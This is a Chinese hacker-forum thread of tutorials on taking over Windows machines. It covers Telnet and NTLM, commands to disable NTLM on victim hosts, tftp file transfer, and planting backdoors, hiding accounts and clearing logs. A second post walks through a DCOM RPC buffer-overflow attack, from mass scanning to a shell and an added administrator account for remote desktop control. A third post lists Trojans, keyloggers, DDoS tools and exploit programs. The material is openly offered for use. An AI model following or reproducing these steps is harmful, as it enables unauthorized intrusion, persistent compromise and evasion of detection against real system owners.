20CN网络安全小组论坛 - 菜鸟乐园 - 黑客入门系列教程：telnet协议入侵后偷QQ的方法

论坛: 菜鸟乐园标题: 黑客入门系列教程：telnet协议入侵后偷QQ的方法

复制本贴地址

作者: abctm [abctm]

版主

[此贴被日月双星(abctm) 在 11月10日22时59分编辑过]

地主发表时间: 11/05 21:51

回复: abctm [abctm]

版主

↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
→→→今天是偶的生日为了庆祝，我发几个帖子大家要顶偶←←←
↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
黑客入门系列教程：telnet协议
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
一摘要
二远程登录
三 Telnet协议
四 Win2000的Telnet服务
五在telnet中该做什么
六结束语

一摘要

Telnet的应用不仅方便了我们进行远程登录，也给hacker们提供了又一种入侵手段和后门，但无论如何，在你尽情享受Telnet所带给你的便捷的同时，你是否真正的了解Telnet呢？

二远程登录

Telnet服务虽然也属于客户机/服务器模型的服务，但它更大的意义在于实现了基于Telnet协议的远程登录（远程交互式计算），那么就让我们来认识一下远程登录。

1 远程登陆的基本概念

先来看看什么叫登录：分时系统允许多个用户同时使用一台计算机，为了保证系统的安全和记帐方便，系统要求每个用户有单独的帐号作为登录标识，系统还为每个用户指定了一个口令。用户在使用该系统之前要输入标识和口令，这个过程被称为'登录'。

远程登陆是指用户使用Telnet命令，使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器，它只负责把用户输入的每个字符传递给主机，再将主机输出的每个信息回显在屏幕上。

2 远程登陆的产生及发展

我们可以先构想一个提供远程文字编辑的服务，这个服务的实现需要一个接受编辑文件请求和数据的服务器以及一个发送此请求的客户机。客户机将建立一个从本地机到服务器的TCP连接，当然这需要服务器的应答，然后向服务器发送键入的信息（文件编辑信息），并读取从服务器返回的输出。以上便是一个标准而普通的客户机/服务器模型的服务。

似乎有了客户机/服务器模型的服务，一切远程问题都可以解决了。然而实际并非你想象的那样简单，如果我们仅需要远程编辑文件，那么刚才所构想的服务完全可以胜任，但假如我们的要求并不是这么简单，我们还想实现远程用户管理，远程数据录入，远程系统维护，想实现一切可以在远程主机上实现的操作，那么我们将需要大量专用的服务器程序并为每一个可计算服务都使用一个服务器进程，随之而来的问题是：远程机器会很快对服务器进程应接不暇，并淹没在进程的海洋里（我们在这里排除最专业化的远程机器）。

那么有没有办法解决呢？当然有，我们可以用远程登录来解决这一切。我们允许用户在远地机器上建立一个登录会话，然后通过执行命令来实现更一般的服务，就像在本地操作一样。这样，我们便可以访问远地系统上所有可用的命令，并且系统设计员不需提供多个专用地服务器程序。

问题发展到这里好像前途一片光明了，用远程登录总应该解决问题了吧，但要实现远程登陆并不简单。不考虑网络设计的计算机系统期望用户只从直接相连的键盘和显示器上登录，在这种机器上增加远程登陆功能需要修改机器的操作系统，这是极其艰巨也是我们尽量避免的。因此我们应该集中力量构造远程登陆服务器软件，虽然这样也是比较困难的。为什么说这样做也比较困难呢？

举个例子来说：一般，操作系统会为一些特殊按键分配特殊的含义，比如本地系统将'Ctrl+C'解释为：'终止当前运行的命令进程'。但假设我们已经运行了远程登陆服务器软件，'Ctrl+C'也有可能无法被传送到远地机器，如果客户机真的将'Ctrl+C'传到了远地机器，那么'Ctrl+C'这个命令有可能不能终止本地的进程，也就是说在这里很可能会产生混乱。而且这仅仅是遇到的难题之一。

但尽管有技术上的困难，系统编程人员还是设法构造了能够应用于大多数操作系统的远程登陆服务器软件，并构造了充当客户机的应用软件。通常，客户机软件取消了除一个键以外的所有键的本地解释，并将这些本地解释相应的转换成远地解释，这就使得客户机软件与远地机器的交互，就如同坐在远程主机面前一样，从而避免了上述所提到的混乱。而那个唯一例外的键，可以使用户回到本地环境。

将远程登陆服务器设计为应用级软件，还有另一个要求，那就是需要操作系统提供对伪终端（pseudo terminal）的支持。我们用伪终端描述操作系统的入口点，它允许像Telnet服务器一样的程序向操作系统传送字符，并且使得字符像是来自本地键盘一样。只有使用这样的操作系统，才能将远程登陆服务器设计为应用级软件（比如Telnet服务器软件），否则，本地操作系统和远地系统传送将不能识别从对方传送过来的信息（因为它们仅能识别从本地键盘所键入的信息），远程登陆将宣告失败。

将远程登陆服务器设计为应用级软件虽然有其显著的优点：比将代码嵌入操作系统更易修改和控制服务器。但其也有效率不高的缺点（后面的内容将会给予解释），好在用户键入信息的速率不高，这种设计还是可以接受的。

3 远程登录的工作过程

使用Telnet协议进行远程登陆时需要满足以下条件：在本的计算机上必须装有包含Telnet协议的客户程序；必须知道远程主机的Ip地址或域名；必须知道登录标识与口令。

Telnet远程登录服务分为以下4个过程：

1）本地与远程主机建立连接。该过程实际上是建立一个TCP连接，用户必须知道远程主机的Ip地址或域名；

2）将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT（Net Virtual Terminal）格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报；

3）将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端，包括输入命令回显和命令执行结果；

4）最后，本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。

上面的内容只是讨论了远程登陆最基本的东西，其中的复杂和编程人员的艰辛是我们难以想象的，不知道你在舒服的使用Telnet的同时，是否想到了这些！

三 Telnet协议

我们知道Telnet服务器软件是我们最常用的远程登录服务器软件，是一种典型的客户机/服务器模型的服务，它应用Telnet协议来工作。那么，什么是Telnet协议？它都具备哪些特点呢？

1 基本内容

Telnet协议是TCP/IP协议族中的一员，是Internet远程登陆服务的标准协议。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务：

1）Telnet定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统，他们只需构造使用标准接口的程序；

2）Telnet包括一个允许客户机和服务器协商选项的机制，而且它还提供一组标准选项；

3）Telnet对称处理连接的两端，即Telnet不强迫客户机从键盘输入，也不强迫客户机在屏幕上显示输出。

2 适应异构

为了使多个操作系统间的Telnet交互操作成为可能，就必须详细了解异构计算机和操作系统。比如，一些操作系统需要每行文本用ASCII回车控制符（CR）结束，另一些系统则需要使用ASCII换行符（LF），还有一些系统需要用两个字符的序列回车-换行（CR-LF）；再比如，大多数操作系统为用户提供了一个中断程序运行的快捷键，但这个快捷键在各个系统中有可能不同（一些系统使用CTRL+C，而另一些系统使用ESCAPE）。如果不考虑系统间的异构性，那么在本地发出的字符或命令，传送到远地并被远地系统解释后很可能会不准确或者出现错误。因此，Telnet协议必须解决这个问题。

为了适应异构环境，Telnet协议定义了数据和命令在Internet上的传输方式，此定义被称作网络虚拟终端NVT（Net Virtual Terminal）。它的应用过程如下：

对于发送的数据：客户机软件把来自用户终端的按键和命令序列转换为NVT格式，并发送到服务器，服务器软件将收到的数据和命令，从NVT格式转换为远地系统需要的格式；
对于返回的数据：远地服务器将数据从远地机器的格式转换为NVT格式，而本地客户机将将接收到的NVT格式数据再转换为本地的格式。
对于NVT格式的详细定义，有兴趣的朋友可以去查找相关资料。

3 传送远地命令

我们知道绝大多数操作系统都提供各种快捷键来实现相应的控制命令，当用户在本地终端键入这些快捷键的时候，本地系统将执行相应的控制命令，而不把这些快捷键作为输入。那么对于Telnet来说，它是用什么来实现控制命令的远地传送呢？

Telnet同样使用NVT来定义如何从客户机将控制功能传送到服务器。我们知道USASCII字符集包括95个可打印字符和33个控制码。当用户从本地键入普通字符时，NVT将按照其原始含义传送；当用户键入快捷键（组合键）时，NVT将把它转化为特殊的ASCII字符在网络上传送，并在其到达远地机器后转化为相应的控制命令。将正常ASCII字符集与控制命令区分主要有两个原因：

1）这种区分意味着Telnet具有更大的灵活性：它可在客户机与服务器间传送所有可能的ASCII字符以及所有控制功能；

2）这种区分使得客户机可以无二义性的指定信令，而不会产生控制功能与普通字符的混乱。

4 数据流向

上面我们提到过将Telnet设计为应用级软件有一个缺点，那就是：效率不高。这是为什么呢？下面给出Telnet中的数据流向：

数据信息被用户从本地键盘键入并通过操作系统传到客户机程序，客户机程序将其处理后返回操作系统，并由操作系统经过网络传送到远地机器，远地操作系统将所接收数据传给服务器程序，并经服务器程序再次处理后返回到操作系统上的伪终端入口点，最后，远地操作系统将数据传送到用户正在运行的应用程序，这便是一次完整的输入过程；输出将按照同一通路从服务器传送到客户机。

因为每一次的输入和输出，计算机将切换进程环境好几次，这个开销是很昂贵的。还好用户的键入速率并不算高，这个缺点我们仍然能够接受。

5 强制命令

我们应该考虑到这样一种情况：假设本地用户运行了远地机器的一个无休止循环的错误命令或程序，且此命令或程序已经停止读取输入，那么操作系统的缓冲区可能因此而被占满，如果这样，远地服务器也无法再将数据写入伪终端，并且最终导致停止从TCP连接读取数据，TCP连接的缓冲区最终也会被占满，从而导致阻止数据流流入此连接。如果以上事情真的发生了，那么本地用户将失去对远地机器的控制。

为了解决此问题，Telnet协议必须使用外带信令以便强制服务器读取一个控制命令。我们知道TCP用紧急数据机制实现外带数据信令，那么Telnet只要再附加一个被称为数据标记(date mark)的保留八位组，并通过让TCP发送已设置紧急数据比特的报文段通知服务器便可以了，携带紧急数据的报文段将绕过流量控制直接到达服务器。作为对紧急信令的相应，服务器将读取并抛弃所有数据，直到找到了一个数据标记。服务器在遇到了数据标记后将返回正常的处理过程。

6 选项协商

由于Telnet两端的机器和操作系统的异构性，使得Telnet不可能也不应该严格规定每一个telnet连接的详细配置，否则将大大影响Telnet的适应异构性。因此，Telnet采用选项协商机制来解决这一问题。

Telnet选项的范围很广：一些选项扩充了大方向的功能，而一些选项制涉及一些微小细节。例如：有一个选项可以控制Telnet是在半双工还是全双工模式下工作（大方向）；还有一个选项允许远地机器上的服务器决定用户终端类型（小细节）。

Telnet选项的协商方式也很有意思，它对于每个选项的处理都是对称的，即任何一端都可以发出协商申请；任何一端都可以接受或拒绝这个申请。另外，如果一端试图协商另一端不了解的选项，接受请求的一端可简单的拒绝协商。因此，有可能将更新，更复杂的Telnet客户机服务器版本与较老的，不太复杂的版本进行交互操作。如果客户机和服务器都理解新的选项，可能会对交互有所改善。否则，它们将一起转到效率较低但可工作的方式下运行。所有的这些设计，都是为了增强适应异构性，可见Telnet的适应异构性对其的应用和发展是多么重要。

上面讨论了一些原理方面的东西，虽然我们在Telnet的使用过程中很难接触到这一层面，但我认为了解这些是有意义的，它会给我们带来许多启示。下面让我们来看看Win2000的Telnet服务。

（本系列教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区 http://ccbirds.yeah.net）

四 Win2000的Telnet服务

其实从应用层面上，Win2000的Telnet服务并没有什么可说的，绝大部分内容你都可以从HELP文件中得到，我在此只是把它稍微整理一下而已。

1 基本配置

Win2000为我们提供了Telnet客户机和服务器程序：Telnet.exe是客户机程序（Client），tlntsvr.exe是服务器程序（server），同时它还为我们提供了Telnet服务器管理程序tlntadmn.exe。

Windows 2000 默认安装了 Telnet 服务，但是并没有默认启动。下面给出HELP文件中 Telnet 服务的一部分默认设置：

AllowTrustedDomain：是否允许域用户访问。默认值是1，允许信任域用户访问。可以改为0: 不允许域用户访问（只允许本地用户）。

DefaultDomain：可以对与该计算机具有信任关系的任何域设置。默认值是"."。

DefaultShell：显示 shell 安装的路径位置。默认值是： %systemroot%\System32\Cmd.exe /q /k

MaxFailedLogins：在连接终止之前显示尝试登录失败的最大次数。默认是3。

LoginScript：显示 Telnet 服务器登录脚本的路径位置。默认的位置就是“%systemroot%\System32\login.cmd”，你可以更改脚本内容，这样登录进Telnet的欢迎屏幕就不一样了。

NTLM：NTLM身份验证选项。默认是2。可以有下面这些值：
0: 不使用 NTLM 身份验证。
1: 先尝试 NTLM 身份验证，如果失败，再使用用户名和密码。
2: 只使用 NTLM 身份验证。

TelnetPort：显示 telnet 服务器侦听 telnet 请求的端口。默认是：23。你也可以更改为其他端口。

以上各项设置你可以使用tlntadmn.exe（Telnet服务器管理程序）来进行非常方便的配置，配置后需要重新启动Telnet服务。如图1

2 NTLM

提到了telnet就不能不提NTLM，我想这也是让入侵者最为头痛的一件事，哪怕你获得了管理员帐号和密码，想简单通过NTLM也并非易事，况且win2000中的telnet默认仅以NTLM方式验证身份，这就让我们不得不关注NTLM这个东东，那么什么是NTLM呢？

早期的SMB协议在网络上明文传输口令，后来出现了"LAN Manager Challenge/Response"验证机制，简称LM，它十分简单以至很容易被破解，微软随后提出了WindowsNT挑战/响应验证机制，即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的：

1、客户端首先在本地加密当前用户的密码成为密码散列
2、客户端向服务器发送自己的帐号，这个帐号是没有经过加密的，明文直接传输
3、服务器产生一个16位的随机数字发送给客户端，作为一个 challenge（挑战）
4、客户端再用加密后的密码散列来加密这个 challenge ，然后把这个返回给服务器。作为 response（响应）
5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西，发送域控制器
6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列，然后使用这个密码散列来加密 challenge。
7、域控制器比较两次加密的 challenge ，如果一样，那么认证成功。

从上面的过程我们可以看出，NTLM是以当前用户的身份向Telnet服务器发送登录请求的，而不是用你扫到的对方管理员的帐户和密码登录，显然，你的登录将会失败。举个例子来说，你家的机器名为A（本地机器），你入侵的机器名为B（远地机器），你在A上的帐户是xinxin，密码是1234，你扫到B的管理员帐号是Administrator，密码是5678，当你想Telnet到B时，NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作，即用xinxin和1234，而并非用你扫到的Administrator和5678，且这些都是自动完成的，根本不给你插手的机会，因此你的登录操作将失败。

由于Telnet服务器对NTLM的使用有3个选项，所以当你Telnet远地机器时，会显示下面情况中的一种：

1)身份验证选项=0时
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:

\\为0时不使用NTML身份验证，直接输入用户名和密码，比如你可以输入扫到的Administrator和5678

2)身份验证选项=1时
=====================================
NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:

\\先尝试 NTLM 身份验证，如果失败，再使用用户名和密码，其实这种方式对于我们来说，与上一种方式没什么区别

3)身份验证选项=2时
=====================================
NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password
Server allows NTLM authentication only
Server has closed connection
遗失对主机的连接。
C:\>

\\仔细看看上面的显示，根本没有给你输入用户名和密码的机会，直接断开连接，扫到了密码也是白扫

所以对于入侵者来说，NTLM是横在我们面前的一座大山，必须要除掉它，一般我们有如下几种方法：

1通过修改远程注册表更改telnet服务器配置，将验证方式从2改为1或0；
2使用NTLM.exe，上传后直接运行，可将telnet服务器验证方式从2改为1；
3在本地建立扫描到的用户，以此用户身份开启telnet客户机并进行远程登录；
4使用软件，比如opentelnet.exe（需要管理员权限且开启IPC管道）
5使用脚本，如RTCS，（需要管理员权限但不依赖IPC管道）

基本上是以上的5种，其中后两种是我们比较常用的开telnet的手法，而且使用方法十分简单，命令如下：

OpenTelnet.exe \\server username password NTLMAuthor telnetport
OpenTelnet.exe \\服务器地址管理员用户名密码验证方式（填0或1） telnet端口

cscript RTCS.vbe targetIP username password NTLMAuthor telnetport
cscript RTCS.vbe <目标IP> <管理员用户名> <密码> <验证方式> <tlnet端口>

五在telnet中该做什么

本来写到上面就想结束了，不过许多朋友都说telnet上去后不知道该做什么了，既然这样，那我就抛砖引玉吧，这次不讲具体做法，只是说说思路，什么？为什么不讲具体做法？篇幅不够嘛，以后我会一一解释的。

1 查看系统信息

呵呵，其实就是随处看看，看看他的系统配置和版本（用type c:\boot.ini来知道pro版或server版），看看都装了什么服务或软件（从目录名就可以知道了），看看有什么重要或有趣的文件啦（唉，要是国外的机器，看也看不懂），看看他的用户情况，总之就是尽可能多的了解系统，为一会装后门摸底。

2 使用tftp传送文件

想必大家都遇到过在telnet中传输文件的问题，因为我们习惯了在ipc管道中的文件传输，所以有些朋友喜欢用net share ipc$ 来打开管道，进而利用copy来传输文件。不过这样反而麻烦，既然我们已经得到了shell，我们可以用TFPT命令来完成这一切，什么是TFTP呢？

用TFTP(Trivial File Transfer Protocol)来实现文件的传送是一种基于UDP连接的文件传输，一般是使用Windows自带的tftp.exe和一个TFTP服务器端软件构成一个完整的传输结构。它是这样使用的：首先运行本地的TFTP Server（比如tftpd32.exe）软件并保证始终开启直至传输全部完成，然后在telnet中（当然你也可以在其他shell中）运行下面的命令：
C:\>tftp �Ci ip get xinxin.exe c:\abc\xinxin.exe
其中ip为你自己机器的ip，且上传文件要与TFTP服务器端在同一目录下，这样你就可以把xinxin.exe上传到c盘abc目录下了（其实是从tftp服务器下载来的）

需要指出的是，如果使用代理IP，你将不能实现与外部网络的文件传送。因为你的代理网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中，代替你的内部网络地址，所以在外部网络进行MAC寻址时是找不到你这台TFTP服务器的。

3 安置后门

安置后门放在第二步好像早了点，如果你入侵还有其他目的，比如以破坏为主，或者是来修改主页的，那么这些事情当然可以在安置后门之前做；如果你只是想得到一只肉鸡，那就没什么可说的了，安后门吧。

后门的种类繁多，也给我们提供了很大的选择余地，能够根据具体情况选择合适的后门的确是一门学问。常用的后门一般有：木马，asp木马，远程控制软件，克隆帐户，建立并隐藏帐户，telnet，telnet扩展的shell，终端服务等。安置一个好的后门通常要注意以下几点：

1 不会被防火墙查杀及阻碍通信：被加入病毒库的后门最好加壳以逃过防火墙，尽量用低端口通信，以免被防火墙屏蔽。

2 最大限度增加隐蔽性：如果你选择远程控制软件，要注意被控端的安装提示和小图标，以及是否同步画面；如果你在帐户上做文章，要尽量保持在cmd和用户管理中都不出破绽；如果你选择放木马或telnet扩展，要注意文件和进程的隐藏；如果新开了终端服务（入侵前并没有开），一定要该掉3389这个显眼的端口，且越低越好。

3 不要当管理员不存在：这是一个大忌，许多朋友在只有默认帐户的机器上建立类似'hacking'的管理员帐户，真是无知者无畏呀。所以安置后门的时候，想想管理员疏忽的地方会在哪里。

4 打补丁：如果想独霸肉鸡，就要会打补丁，要知道对肉鸡的竞争是很激烈的。怎么打补丁呢？这个也要问？想想你是怎么进来的吧。算了，提示一下，除了修补大的漏洞以外（上传官方补丁并运行），也要注意它的共享，ipc$共享（最好都关闭），可疑端口，容易被利用的服务等。不过打补丁也要注意隐蔽性的，不要让管理员发现大的改动。

5 清除日志：可以手动或利用软件，如果不太会就去找相关教材吧，在这里我不详细介绍了。

六结束语

文章的前部分主要说了一些原理性的东西，后部分则侧重于应用，写的多了难免会有些遗漏，如果你觉得哪里还需要补充，或者哪里不明白，请回帖告诉我哟！！

B1层发表时间: 11/05 21:55

回复: abctm [abctm]

版主

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
快速获得3389肉机
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓

　　这是我第一次写技术文章，不当之处还请大家指正。
记得从前看过一篇文章介绍如何快速获得3389肉机的文章，基本思路及步骤如下：先通过superscan等扫描端口的工具扫一段开启3389端口的主机，然后导出主机列表，再由x-scan扫描NT弱口令，配置强一点的字典，稍等一会儿，得到偌多弱口令，祭起终端连接，成功连接填入用户名就可以远程登陆控制了。留后门，删日志……
其实得到开启3389服务的主机列表后，我们完全可以利用当前危害最大的“dcomrpc漏洞”添加一个管理员帐号，再用这个帐号轻松地登陆到远程终端，达到图形化的完全控制。
用到的工具有：superscan、x-scanV2.3、还有一个新增的x-scan的插件DComRpc.xpn，专门用来扫描存在DComRpc漏洞的机器。可以到这里下载http://www.xfocus.net/tools/200307/DComRpc.xpn，把它放到x-scan下plugin目录下。x-scan便有了扫描DComRpc漏洞的功能。当然你也可以下载专用的扫描器。不过经本人测试，这个插件还是相当好用的。还有主角远程 DCOM RPC 缓冲区溢出工具点击这里下载http://81.heibai.net:81/download/show.php?id=3951。
要开工了。用superscan得到主机列表，save成文本文件修改为一行一个IP的格式，这个过程略过不说了。打开加入了插件的x-scan，扫描参数中选“从文件获取主机列表”，选取刚才保存的文件。在扫描模块中只选择最后一项，也就是刚加进去的插件，Dcomrpc溢出漏洞。开始扫描吧，你会发现几乎是所有的机器都存在这个好玩而简单的漏洞。现在该用xpdcomrpc了，先看一下帮助吧：
---------------------------------------------------------
- 远程 DCOM RPC 缓冲区溢出
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- EXE 文件编译及修改：sagi http://www.hackerxfiles.net
- Usage: xp <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP0 (english2)
- 2 Windows 2000 SP1 (english)
- 3 Windows 2000 SP2 (english)
- 4 Windows 2000 SP2 (english2)
- 5 Windows 2000 SP3 (english)
- 6 Windows 2000 SP3 (english2)
- 7 Windows 2000 SP3 (english3)
- 8 Windows 2000 SP4 (english)
- 9 Windows XP SP0 (english)
- 10 Windows XP SP1 (english)
- 11 Windows XP SP1 (english2)
- 12 Windows XP SP2 (english)
- 13 Windows 2000 SP3 (chinese)
- 14 Windows 2000 SP4 (chinese)
- 15 Windows XP SP0 (chinese)
- 16 Windows XP SP1 (chinese)
- 17 Windows 2000 SP0 (japanese)
- 18 Windows 2000 SP1 (japanese)
- 19 Windows 2000 SP2 (japanese)
- 20 Windows 2000 SP0-1 (big5)
- 21 Windows 2000 SP3 (big5)
- 22 Windows 2000 SP4 (big5)
- 23 Windows XP SP0-1 (big5)
- 24 Windows 2000 SP0 (korean)
- 25 Windows 2000 SP1 (korean)
- 26 Windows 2000 SP2 (korean)
- 27 Windows 2000 SP4 (korean)
明白了吗？现在我们就可以这样了：
xp 13 192.168.1.*
一段提示过后，看到跳出的shell了吗？
c:\winnt\system32>
呵呵，到这一步，一切都好做了
c:\winnt\system32>net user admin hahaha /add
命令成功完成
c:\winnt\system32>net localgroup administrators admin /add
命令成功完成
好了，现在就可以用这个帐号admin进行3389远程控制了。
这种方法比较简单吧，要比起破解nt弱口令要主动一些，在此也是提出一种思路吧。从一开始的输入法漏洞开始，3389注定不能平安，愿大家都找到自己好用的肉机吧~

B2层发表时间: 11/05 22:08

回复: abctm [abctm]

版主

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
成为顶级黑客(2003年)必备软件！
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓

CGI后门：
cgi网页后门 cgi网页后门，envymask编写...《
网页合并器本程序可以自动生成网页，可以把网页和EXE合成新的网页，在打开网页的同时自动运行EXE文件.你将木马合并在一个网页中，别人浏览之后，呵呵，我什么都没说~~~
海阳顶端网木马 windows环境下永远不会被查杀的木马，因为它是用asp做的，也是一套asp在线极好的网页编辑软件，支持在线更改、编辑、删除任意文本文件，同时最重要的是解决了无组件asp上传...（中文版
cgi-backdoor 几个cgi木马(十多种利用最新漏洞的web脚本后门，涵盖jsp,php,asp,cgi等等) *

命令行后门类
winshell
WinShell是一个运行在Windows平台上的Telnet服务器软件，主程序是一个仅仅5k左右的可执行文件，可完全独立执行而不依赖于任何系统动态连接库，尽管它体积小小，却功能不凡，支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等...《入侵NT中winshell的使用》
Gina
Gina木马的主要作用是在系统用户登陆时，将用户登陆的名字，登陆密码等记录到文件中去，因为这个DLL是在登陆时加载，所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户...儒
Wollf1.5 我们的一位女黑客写的软件，扩展Telnet服务，集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能，可反向连接，可通过参数选择随系统启动或作为普通进程启动
WinEggDrop Shell 1.50最终版在一个扩展型的telnet后门程序{中国最强的后门}
**********************************************************************************************
菜鸟扫描软件！
20CN IPC 扫描器正式版
全自动IPC扫描器，可以同步植入木马，可以透过部分没有配置完整的防火墙，能够探测流光探测不到的一些用户...（中文版）
网络肉鸡猎手
一个快速查找网络肉鸡的小工具
网页信息神探使得网页不再有秘密，各种信息一目了然，什么电影、图片、Email地址、文章、Flash、压缩文件、可执行文件...等等的链接地址无处可藏！连续而快速下载各种软件、打包教程、VB、VC、动画教程、Flash、电影、写真图片

**************************************************************************************
SQL2.exe SQL蠕重听过吧，就是的这个漏洞！

NetScanTools 一款功能强大的网络工具包...（英文版）

dvbbs.exe
动网logout.asp利用程序

THCsql
针对David Litchfield发现的MSSQL OpenDataSource函数漏洞的攻击程序，内含源代码。

小紫V2.0追加版
*小紫*（LB论坛噩梦）V2.0追加版加入LB.EXE，可以获得论坛管理员权限。

LB5论坛轰炸机
我兄弟写的程序，{推存}
LB5论坛轰炸机修正版2.5在LB5论坛轰炸机修正版2.0的原有功能基础上增加以下功能及特性：1同时支持6线程轰炸，速度可比V2.0提高一倍以上 2机器智能重新增加,带有自动转向定位功能 3增加监视窗口 4标题可改...（

MSN 消息攻击机
这是一个用于MSN Messenger 的消息攻击机（其实不局限于MSN 的），它具有超快的攻击速度，据测试，在普通Pentium 200 MMX 攻击速度可以达到5条/秒。而且软件体积极小，有效节省系统资源...（

怪狗专用版3389登陆器我改的一个小程序，有用户名密码，用它可以3389登陆win系统，（必备）

DameWare NT Utilities
一款功能强大的Windows NT/2000/XP 服务器远程控制软件，只要拥有一个远程主机的管理帐号，就能使用它远程GUI下登陆交互控制主机...（英文版）《

追捕：找到IP所在地！

柳叶擦眼
这个小软件可以列出系统所有的进程（包括隐藏的），并可以杀死进程.这个是共享软件...（中文版）《让传奇木马走开》

Xdebug ey4s大哥写的windows 2000 kernel exploit，有了它提升权限就简单了！

代理之狐可得到最新代理，用于隐藏真实IP，不过，有能力最好自己在肉机上做个代理安全！

HackerDicBuilder 本软件属于一款字典制作工具，根据国人设置密码的习惯,利用线程技术，生成字典文件 ... （中文版）多位朋友点播

scanipc 这个是木头见过的最傻瓜化的入侵软件了，只要设置好你要上传的后门和IP范围，它就会开始工作了，界面简单实用，全自动IPC扫描器，可以同步植入木马，可以透过部分没有配置完整的防火墙，能够探测流光探测不到的一些用户 ...

Tiny Honeypot 这是一款简单的蜜罐程序，主要基于iptables的重定向和一个xinetd监听程序，它监听当前没有使用的每个TCP端口记录所有的活动信息，并且提供一些回送信息给入侵者。应答部分全部采用perl程序编写，它提供了足够的交互信息足以愚弄大多数的自动攻击工具和小部分的入侵者。通过缺省的适当限制，该程序可以安装在产品主机上，而几乎不会影响主机的性能（应用平台Linux/POSIX）

Clearlog 用于删除Windows NT/2K/XP的WWW和FTP安全日志文件，通常入侵某台服务器后为了避免被跟踪，都采用这一方法来消除IP记录 ... 《入侵全攻略》

LC4 可以检测用户是否使用了不安全的密码，是最好，最快的Win NT/2000 workstations 密码破解工具，目前这是最新版本.它宣称：在P300机器上不到48小时可以破解90%的超级用户(Admin)口令.18%不到10分钟就可以破解出来 ...

独裁者 DDOS 工具，此软件太厉害，千万不可烂用，否则可能进监狱！

LocatorHack.exe MS Locator!formQueryPacket.wcscpy 远程溢出工具与webdav漏洞一样厉害。Microsoft Windows Locator服务远程缓冲区溢出漏洞

TFTPD32.exe 图形化的TPTP工具，做黑客这样的工具都没有，说不过去！

iis5sp3 说明中说，iis5安装sp3的溢出成功，反正我在sp3下没成功过！

smbrelay.exe 可利用网页得到NT密码散列！{推存}

IECookiesView1.5 可改写cookies信息，有此工具进行cookies欺骗就简单多了，

HackPass.exe，MD5.exe 破解MD5密码的软件~！

DVGetPass.exe 动网tongji.asp漏洞利用工具，可得到论坛管理员权限，再上传ASP木马！呵呵就~~~~

webadv 针对iis+sp3的溢出成功率很高(溢出后system权限!) *

R_ webadv 能用版的webdav漏洞使用工具！听说，日本，繁体都能用，
ipscan 大范围网段快速ipc$猜解

svc 远程安装/删除win2k服务

3389.vbs 远程安装win2k终端服务不需i386

arpsniffer arp环境sniffer(需要winpcap2.1以上) *

ascii 查询字符和数字ascii码(常用来对url编码用以躲避ids或脚本过滤)

ca 远程克隆账号

cca 检查是否有克隆账号

crackvnc 远程/本地破解winvnc密码(本地破用-W参数)

pass.dic 密码字典

debploit win2k+sp2配置最佳权限提升工具

fpipe 端口重定向工具

fscan superscan命令行版本(可定义扫描时的源端口并支持udp端口扫描) *

hgod04 ddos攻击器

idahack ida溢出

idq.dll 利用isapi漏洞提升权限(对sp0+sp1+sp2都非常有效，也是很棒的web后门)

IIS idq溢出

inst.zip 指定程序安装为win2k服务 *

ip_mail.rar 发送主机动态IP的软件 *

ipc.vbs 不依赖ipc$给远程主机开telnet

ispc.exe idq.dll连接客户端

Keyghost.zip 正版键盘记录器

log.vbs 日志清除器(远程清除不依赖ipc$)

msadc.pl winnt的msadc漏洞溢出器 *

MsSqlHack mssql溢出程序1

mysql-client mysql客户端

Name.dic 最常用的中国人用户名(看看你常用的用户名在不在里面)

PassSniffer 大小仅3kb的非交换机sniffer软件 *

psexec 通过ipc管道直接登录主机

pskill 杀进程高手

pslist 列进程高手

rar 命令行下的中文版winrar(功能相当全面) *

reboot.vbs 远程重启主机的脚本

sdemo.zip 巨好的屏幕拍摄的录像软件

shed 远程查找win9x的共享资源

sid 用sid列用户名

SkServerGUI snake多重代理软件

SkSockServer snake代理程序

